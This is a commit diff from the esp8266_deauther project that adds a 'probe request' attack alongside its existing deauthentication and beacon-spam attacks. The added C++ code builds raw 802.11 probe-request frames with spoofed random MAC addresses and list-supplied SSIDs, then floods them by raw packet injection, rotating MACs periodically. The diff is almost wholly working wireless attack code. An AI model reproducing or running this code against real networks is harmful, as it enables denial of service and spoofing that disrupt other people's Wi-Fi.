Skip to content

Commit 141c9f1

Browse files
author
Stefan Kremser
committed
Added Probe Request Attack
1 parent 42058cf commit 141c9f1

File tree

5 files changed

+94
-26
lines changed

5 files changed

+94
-26
lines changed

esp8266_deauther/Attack.cpp

+64-14
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Attack::Attack(){
55
}
66

77
void Attack::generate(){
8-
if(debug) Serial.print("generating Macs...");
8+
if(debug) Serial.print("\n generating Macs...");
99

1010
Mac _randomBeaconMac;
1111
uint8_t _randomMacBuffer[6];
@@ -80,6 +80,24 @@ void Attack::buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt){
8080

8181
}
8282

83+
void Attack::buildProbe(String _ssid, Mac _mac){
84+
int len = _ssid.length();
85+
if(len > 32) len = 32;
86+
packetSize = 0;
87+
88+
for(int i=0;i<sizeof(probePacket);i++) packet[packetSize+i] = probePacket[i];
89+
packetSize += sizeof(probePacket);
90+
91+
for(int i=0;i<6;i++) packet[10+i] = _mac._get(i);
92+
93+
packet[packetSize] = len;
94+
packetSize++;
95+
96+
for(int i=0;i<len;i++) packet[packetSize+i] = _ssid[i];
97+
packetSize += len;
98+
99+
}
100+
83101
bool Attack::send(){
84102
if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
85103
/*
@@ -101,7 +119,7 @@ void Attack::run(){
101119

102120
/* =============== Deauth Attack =============== */
103121
if(isRunning[0] && currentMillis-prevTime[0] >= 1000){
104-
if(debug) Serial.print("running "+(String)attackNames[0]+" attack");
122+
if(debug) Serial.print("running "+(String)attackNames[0]+" attack...");
105123
prevTime[0] = millis();
106124

107125
for(int a=0;a<apScan.results;a++){
@@ -150,7 +168,7 @@ void Attack::run(){
150168

151169
/* =============== Beacon clone Attack =============== */
152170
if(isRunning[1] && currentMillis-prevTime[1] >= 100){
153-
if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
171+
if(debug) Serial.print("running "+(String)attackNames[1]+" attack...");
154172
prevTime[1] = millis();
155173

156174
for(int a=0;a<apScan.results;a++){
@@ -193,7 +211,7 @@ void Attack::run(){
193211
generate();
194212
macListChangeCounter = 0;
195213
}
196-
if(debug) Serial.println(" done ");
214+
if(debug) Serial.println(" done");
197215
if(settings.attackTimeout > 0){
198216
attackTimeoutCounter[1]++;
199217
if(attackTimeoutCounter[1]/10 > settings.attackTimeout) stop(1);
@@ -202,7 +220,7 @@ void Attack::run(){
202220

203221
/* =============== Beacon list Attack =============== */
204222
if(isRunning[2] && currentMillis-prevTime[2] >= 100){
205-
if(debug) Serial.print("running "+(String)attackNames[2]+" attack");
223+
if(debug) Serial.print("running "+(String)attackNames[2]+" attack...");
206224
prevTime[2] = millis();
207225

208226
for(int a=0;a<ssidList.len;a++){
@@ -216,17 +234,41 @@ void Attack::run(){
216234

217235
stati[2] = (String)(packetsCounter[2]*10)+"pkts/s";
218236
packetsCounter[2] = 0;
219-
/*macListChangeCounter++;
237+
macListChangeCounter++;
220238
if(macListChangeCounter/10 >= macChangeInterval && macChangeInterval > 0){
221239
generate();
222240
macListChangeCounter = 0;
223-
}*/
224-
if(debug) Serial.println("done");
241+
}
242+
if(debug) Serial.println(" done");
225243
if(settings.attackTimeout > 0){
226244
attackTimeoutCounter[2]++;
227245
if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2);
228246
}
229247
}
248+
249+
/* =============== Probe Request Attack =============== */
250+
if(isRunning[3] && currentMillis-prevTime[3] >= 1000){
251+
if(debug) Serial.print("running "+(String)attackNames[3]+" attack...");
252+
prevTime[3] = millis();
253+
254+
for(int a=0;a<ssidList.len;a++){
255+
buildProbe(ssidList.get(a), beaconAdrs._get(a));
256+
if(send()) packetsCounter[3]++;
257+
}
258+
259+
stati[3] = (String)(packetsCounter[3]*10)+"pkts/s";
260+
packetsCounter[3] = 0;
261+
macListChangeCounter++;
262+
if(macListChangeCounter >= macChangeInterval && macChangeInterval > 0){
263+
generate();
264+
macListChangeCounter = 0;
265+
}
266+
if(debug) Serial.println("done");
267+
if(settings.attackTimeout > 0){
268+
attackTimeoutCounter[3]++;
269+
if(attackTimeoutCounter[3] > settings.attackTimeout) stop(3);
270+
}
271+
}
230272

231273
}
232274

@@ -239,15 +281,23 @@ void Attack::start(int num){
239281
prevTime[num] = millis();
240282
attackTimeoutCounter[num] = 0;
241283
refreshLed();
242-
if(debug) Serial.println("starting "+(String)attackNames[num]+" attack");
243-
if(num == 1 && isRunning[2]) stop(2);
244-
else if(num == 2 && isRunning[1]) stop(1);
284+
if(debug) Serial.println("starting "+(String)attackNames[num]+" attack...");
285+
if(num == 1){
286+
stop(2);
287+
stop(3);
288+
} else if(num == 2){
289+
stop(1);
290+
stop(3);
291+
} else if(num == 3){
292+
stop(1);
293+
stop(2);
294+
}
245295
}else stop(num);
246296
}
247297

248298
void Attack::stop(int num){
249299
if(isRunning[num]){
250-
if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack");
300+
if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack...");
251301
isRunning[num] = false;
252302
stati[num] = "ready";
253303
prevTime[num] = millis();
@@ -265,7 +315,7 @@ String Attack::getResults(){
265315
for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready";
266316

267317
if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP";
268-
if(ssidList.len < 1) stati[2] = "no SSID";
318+
if(ssidList.len < 1) stati[2] = stati[3] = "no SSID";
269319

270320
int _selected;
271321
String json = "{ \"aps\": [";
@@ -311,7 +361,7 @@ String Attack::getResults(){
311361
json += "}";
312362
if(debug){
313363
Serial.println(json);
314-
Serial.println("done ");
364+
Serial.println("done");
315365
}
316366
return json;
317367
}

esp8266_deauther/Attack.h

+16-2
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ extern "C" {
1414
#include "Settings.h"
1515
#include "SSIDList.h"
1616

17-
#define attacksNum 3
17+
#define attacksNum 4
1818
#define macListLen 64
1919
#define macChangeInterval 4
2020

@@ -43,10 +43,11 @@ class Attack
4343

4444
void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason);
4545
void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt);
46+
void buildProbe(String _ssid, Mac _mac);
4647
bool send();
4748

4849
//attack declarations
49-
const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"};
50+
const String attackNames[attacksNum] = {"deauth", "beacon (clone)", "beacon (list)", "probe request"};
5051

5152
//attack infos
5253
String stati[attacksNum];
@@ -107,6 +108,19 @@ class Attack
107108
0x00, 0x00 //RSN capabilities
108109
};
109110

111+
uint8_t probePacket[25] = {
112+
/* 0 - 1 */ 0x40, 0x00, //Type: Probe Request
113+
/* 2 - 3 */ 0x00, 0x00, //Duration: 0 microseconds
114+
/* 4 - 9 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //Destination: Broadcast
115+
/* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //Source: random MAC
116+
/* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //BSS Id: Broadcast
117+
/* 22 - 23 */ 0x00, 0x00, //Sequence number (will be replaced by the SDK)
118+
/* 24 */ 0x00 //Tag Number: SSID parameter set (0)
119+
/* ,0x06, //Tag length
120+
0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA //SSID
121+
*/
122+
};
123+
110124
int macListChangeCounter = 0;
111125
int attackTimeoutCounter[attacksNum];
112126
int channels[macListLen];

0 commit comments

Comments
 (0)